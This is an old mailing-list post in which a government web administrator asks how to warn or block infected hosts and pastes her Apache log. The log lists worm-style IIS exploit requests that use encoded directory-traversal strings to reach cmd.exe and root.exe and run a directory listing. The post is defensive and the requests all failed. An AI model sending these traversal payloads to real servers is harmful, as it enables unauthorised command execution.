[Techtalk] outlook virii

Davis, Jennifer JDavis at JUSTICE.GC.CA
Fri Apr 12 17:20:09 EST 2002 

Hi:

	I was wondering if it was possible to send some sort of message back
to people. (like maybe a popup message) when they hit my webserver that
surfing with viruses on their system is just not cool  See an except from my
log below.  I estimate that 95% of the hits to my web server are these
exploit attempts.  Barring that is there a way to block an IP that we'll say
is looking for root.exe?  The weserver is a standard Apache 1.3?  that came
with Slackware 8.0.

Thanks again
Jenn

Jennifer Davis
Constitutional & Administrative Law - Droit administratif & constitutionnel
Department of Justice Canada - Ministère de la Justice du Canada
*(613) 957-4963 - fx (613) 941-1937
*jdavis at justice.gc.ca

64.168.22.13 - - [10/Apr/2002:17:10:57 -0400] "GET /scripts/root.exe?/c+dir
HTTP/1.0" 404 1601
64.168.22.13 - - [10/Apr/2002:17:10:58 -0400] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 1601
64.168.22.13 - - [10/Apr/2002:17:10:58 -0400] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
64.168.22.13 - - [10/Apr/2002:17:10:59 -0400] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
64.168.22.13 - - [10/Apr/2002:17:11:00 -0400] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
64.168.22.13 - - [10/Apr/2002:17:11:00 -0400] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 1601
64.168.22.13 - - [10/Apr/2002:17:11:01 -0400] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 1601
64.168.22.13 - - [10/Apr/2002:17:11:01 -0400] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+dir HTTP$
64.168.22.13 - - [10/Apr/2002:17:11:02 -0400] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
64.168.22.13 - - [10/Apr/2002:17:11:03 -0400] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
64.168.22.13 - - [10/Apr/2002:17:11:04 -0400] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
64.168.22.13 - - [10/Apr/2002:17:11:04 -0400] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
64.168.22.13 - - [10/Apr/2002:17:11:05 -0400] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285
64.168.22.13 - - [10/Apr/2002:17:11:05 -0400] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285
64.168.22.13 - - [10/Apr/2002:17:11:06 -0400] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601
64.168.22.13 - - [10/Apr/2002:17:11:06 -0400] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1601

More information about the Techtalk mailing list